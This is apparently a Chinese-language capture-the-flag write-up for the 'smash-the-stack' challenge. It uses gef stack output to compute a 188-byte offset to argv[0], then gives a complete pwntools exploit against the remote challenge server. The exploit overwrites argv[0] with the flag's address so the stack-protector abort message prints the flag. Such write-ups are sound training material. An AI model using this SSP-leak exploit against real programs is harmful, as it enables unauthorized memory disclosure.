一道典型的Stack smash的题目,用之前写过的ssp leak ( Stack Smashes Protect leak) 直接做就行了
计算偏移
gef➤ telescope $esp 20
0xff858410│+0x00: 0x00000000 ← $esp
0xff858414│+0x04: 0xff858428 → 0x61616161
0xff858418│+0x08: 0x00010000
0xff85841c│+0x0c: 0x00000000
0xff858420│+0x10: 0x00000001
0xff858424│+0x14: 0xff8584e4 → 0xff85a163 → "smash-the-stack"
0xff858428│+0x18: 0x61616161 ← $ebx, $ecx
0xff85842c│+0x1c: 0x1bc60c0a
0xff858430│+0x20: 0xff858450 → 0x00000001
0xff858434│+0x24: 0x00000000
0xff858438│+0x28: 0x00000000 ← $ebp
0xff85843c│+0x2c: 0xf75ab637 → <__libc_start_main+247> add esp, 0x10
0xff858440│+0x30: 0xf7745000 → 0x001b1db0
0xff858444│+0x34: 0xf7745000 → 0x001b1db0
0xff858448│+0x38: 0x00000000
0xff85844c│+0x3c: 0xf75ab637 → <__libc_start_main+247> add esp, 0x10
0xff858450│+0x40: 0x00000001
0xff858454│+0x44: 0xff8584e4 → 0xff85a163 → "smash-the-stack"
0xff858458│+0x48: 0xff8584ec → 0xff85a173 → "INSTANCE="
0xff85845c│+0x4c: 0x00000000
gef➤ print &__libc_argv[0]
$2 = (char **) 0xff8584e4
>> 0xff8584e4 - 0xff858428
188
所以我们可以得到偏移为188,然后加上我们想泄漏flag的地址0x0804A060
完整exp:
from pwn import *
#context.log_level = 'debug'
#p = process('smash-the-stack',env = {"LD_PRELOAD":"../libc-2.23.so.i386"})
p = remote('hackme.inndy.tw',7717)
#gdb.attach(p)
p.recvuntil('flag\n')
payload = 'a'*188 + p32(0x0804A060)
p.sendline(payload)
p.recvuntil('detected ***: ')
flag = p.recvuntil('}')
print flag
p.interactive()